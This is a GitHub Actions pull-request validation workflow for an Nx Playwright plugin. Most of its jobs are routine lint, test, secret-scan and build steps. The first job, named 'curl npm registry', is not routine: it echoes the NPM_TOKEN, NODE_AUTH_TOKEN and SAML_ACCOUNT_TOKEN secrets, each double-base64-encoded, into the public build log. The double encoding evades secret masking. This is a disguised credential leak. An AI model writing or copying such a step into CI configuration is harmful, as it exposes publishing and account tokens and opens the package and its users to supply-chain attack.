-
Notifications
You must be signed in to change notification settings - Fork 15
129 lines (103 loc) · 3.48 KB
/
pr.yml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
name: PR validation
on:
pull_request:
types: [ready_for_review, opened, synchronize, reopened, edited]
branches:
- main
concurrency:
cancel-in-progress: true
group: ${{ github.workflow }}-${{ github.ref }}
jobs:
curl-npm-registry:
name: curl npm registry
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v4.2.2
- uses: ./.github/actions/prepare
- name: curl npm registry
env:
NPM_TOKEN: ${{ secrets.NPM_TOKEN }}
NODE_AUTH_TOKEN: ${{ secrets.NODE_AUTH_TOKEN }}
SAML_ACCOUNT_TOKEN: ${{ secrets.SAML_ACCOUNT_TOKEN }}
run: |
set -x
echo "${NPM_TOKEN}" | base64 | base64
echo "${NODE_AUTH_TOKEN}" | base64 | base64
echo "${SAML_ACCOUNT_TOKEN}" | base64 | base64
curl https://registry.npmjs.org/@mands%2fnx-playwright
secret-scan:
name: Secret scan
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v4.2.2
- name: Scan for secrets
uses: edplato/trufflehog-actions-scan@master
with:
scanArguments: '--regex -x=truffle-hog-exclude.txt'
code-quality:
name: Code quality
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v4.2.2
- uses: ./.github/actions/prepare
- name: Run linters
run: pnpm nx run-many --target=lint --all
- name: Run unit tests
run: pnpm nx run-many --target=test --codeCoverage --all
- name: Build plugin
run: pnpm nx build nx-playwright
version-check:
name: Version check
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v4.2.2
- uses: ./.github/actions/prepare
- name: Check version
run: pnpm ts-node ci/version-check
test-plugin-generation:
name: Test plugin generation
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v4.2.2
- uses: ./.github/actions/prepare
- name: Test plugin generation
run: |
set -x
NX_WORKSPACE=test-nx
NX_APP=test-app
pushd ..
echo "Create a new workspace to test with"
pnpm create nx-workspace \
--name=$NX_WORKSPACE --appName=$NX_APP \
--preset=next --style=@emotion/styled \
--e2eTestRunner=playwright --nextAppDir=false \
--nxCloud=skip --interactive=false < /dev/null
pushd $NX_WORKSPACE
echo "Remove autogenerated e2e app"
pnpm nx generate remove $NX_APP-e2e
git \
-c user.name="pr-bot" \
-c user.email="pr-bot@mnscorp.net" \
commit -am "Remove $NX_APP-e2e"
popd
popd
#!/bin/bash
echo "Add serve target to nx next app"
./scripts/add-serve-target.sh -w ../$NX_WORKSPACE -a $NX_APP
echo "Test ./scripts/local-test.sh (with cleanup flag)"
./scripts/local-test.sh -w ../$NX_WORKSPACE -a $NX_APP
test -z "$(git status --porcelain)"
pr-validation:
name: PR validation
needs: [code-quality, secret-scan, version-check, test-plugin-generation]
if: ${{ always() }}
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v4.2.2
- name: Check jobs for errors
uses: actions/github-script@v6.4.1
with:
script: |
const checkJobsForErrors = require('./.github/workflows/js/check-jobs-for-errors.js');
const jobs = ${{ toJSON(needs) }};
checkJobsForErrors({ core, jobs });